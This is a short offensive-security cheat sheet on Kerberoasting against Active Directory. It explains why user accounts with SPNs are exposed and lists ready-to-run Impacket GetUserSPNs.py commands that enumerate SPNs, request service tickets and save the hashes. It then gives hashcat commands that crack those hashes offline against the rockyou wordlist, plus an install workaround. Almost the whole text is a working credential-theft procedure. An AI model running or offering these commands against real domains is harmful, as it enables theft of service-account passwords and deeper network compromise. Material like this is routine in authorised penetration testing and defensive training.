Kerberoasting

GetUserSPNs.py

#Any authenticated domain user can request a TGS from a DC for any SPN that is registered on a user (service) account, as opposed to the host-based SPNs on computer accounts. The KDC does not check whether the requester is authorised to use the service; that decision is left to the service itself. The encrypted part of the returned ticket is encrypted with the service account's long-term key, which for RC4-HMAC (etype 23) is the account's NT hash (MD4 of the UTF-16LE password). The ticket can therefore be taken offline and cracked against a wordlist with no further contact with the DC and no lockout risk. Computer accounts have long random passwords and are not worth roasting; the targets are user accounts that carry an SPN and a weak password.

cd Impacket/examples

#Search for SPNs without typing a password (-no-pass only skips the prompt; the LDAP bind still needs credentials, so pair it with -k and a ticket in KRB5CCNAME, or pass -hashes LM:NT instead)

GetUserSPNs.py domain.loc/username -dc-ip 10.0.0.1 -no-pass

#Search for SPNs with credentials (lists the accounts and their SPNs, no tickets requested)

GetUserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1

#Search for SPNs with credentials, request a TGS for each and write the hashes out in hashcat format

GetUserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1 -request -outputfile kerb.txt

#Cracking the hash (hashcat mode 13100 = Kerberos 5 etype 23 TGS-REP, lines starting $krb5tgs$23$). The hash file is a positional argument, not -outputfile. If the DC issued AES tickets instead, the lines start $krb5tgs$17$ or $krb5tgs$18$ and need -m 19600 or -m 19700.

hashcat -m 13100 -a 0 kerb.txt /usr/share/wordlists/rockyou.txt

#show cracked password

hashcat -m 13100 --show kerb.txt

note:

GetUserSPNs.py, when run from a GitHub checkout of Impacket, can fail with the following error:

'NoneType' object has no attribute 'getCredential'

Install the Kali-packaged version instead with the following command:

sudo apt install python3-impacket

The command name then changes to impacket-GetUserSPNs and there is no need to cd into the examples directory:

impacket-GetUserSPNs fqdn.com/svc_user:Password1234 -dc-ip 10.0.0.1 -request
